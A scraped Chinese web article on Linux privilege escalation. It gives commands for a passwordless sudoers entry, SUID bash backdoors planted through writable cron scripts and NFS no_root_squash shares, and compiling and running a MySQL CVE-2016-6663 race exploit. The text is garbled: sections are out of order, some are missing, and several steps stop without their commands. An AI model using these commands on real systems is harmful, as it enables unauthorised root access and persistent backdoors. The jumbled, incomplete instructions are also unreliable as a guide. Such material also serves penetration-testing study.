Linux提权的几种常用方式 过来看看吧！

SUDO提权

普通用户在使用sudo执行命令的过程中，会以root方式执行命令。在很多场景里，管理员为了运维管理方便，sudoer配置文件错误导致提权。

(1)设置sudo免密码

1. $vi /etc/sudoers 
2. 在最后一行添加：bypass ALL=(ALL:ALL) NOPASSWD:ALL 

(2)查看sudo的权限

4、计划任务

如果可以找到可以有权限修改的计划任务脚本，就可以修改脚本实现提权。本质上，就是文件权限配置不当。

(1)查看计划任务，找到有修改权限的计划任务脚本。

1. ls -l /etc/cron* 
2. more /etc/crontab 

(2)在mysqlback.sh 添加 SUID shell后门，当定时任务以root再次执行的时候，可以获取root权限。

1. cp /bin/bash /tmp/shell 
2. chmod u+s /tmp/shell 

5、NFS提权

当服务器中存在NFS共享，开启no_root_squash选项时，如果客户端使用的是root用户，那么对于共享目录来说，该客户端就有root权限，可以使用它来提升权限。

(1)查看NFS服务器上的共享目录

1. sudo showmount -e 10.1.1.233 

(2)创建本地挂载目录，挂载共享目录。使用攻击者本地root权限创建Suid shell。

1. sudo mkdir -p /tmp/data 
2. sudo mount -t nfs 10.1.1.233:/home/bypass /tmp/data 
3. cp /bin/bash /tmp/data/shell 
4. chmod u+s /tmp/data/shell 

(3)回到要提权的服务器上，使用普通用户使用-p参数来获取root权限。

6、MySQL提权

MySQL提权方式有UDF提权，MOF提权，写入启动项提权等方式，但比较有意思的是CVE-2016-6663、CVE-2016-6664组合利用的提取场景，可以将一个www-data权限提升到root权限。

(1)利用CVE-2016-6663将www-data权限提升为mysql权限：

1. cd /var/www/html/ 
2. gcc mysql-privesc-race.c -o mysql-privesc-race -I/usr/include/mysql -lmysqlclient 
3. ./mysql-privesc-race test 123456 localhost testdb 

(2)利用CVE-2016-6664将Mysql权限提升为root权限：

在渗透测试过程中，提升权限是非常关键的一步，攻击者往往可以通过利用内核漏洞/权限配置不当/root权限运行的服务等方式寻找突破点，来达到提升权限的目的。

1、内核漏洞提权

提起内核漏洞提权就不得不提到脏牛漏洞(Dirty Cow)，是存在时间最长且影响范围最广的漏洞之一。低权限用户可以利用该漏洞实现本地提权，同时可以通过该漏洞实现Docker容器逃逸，获得root权限的shell。

（编辑：衡阳站长网）

【声明】本站内容均来自网络，其相关言论仅代表作者个人观点，不代表本站立场。若无意侵犯到您的权利，请及时与联系站长删除相关内容!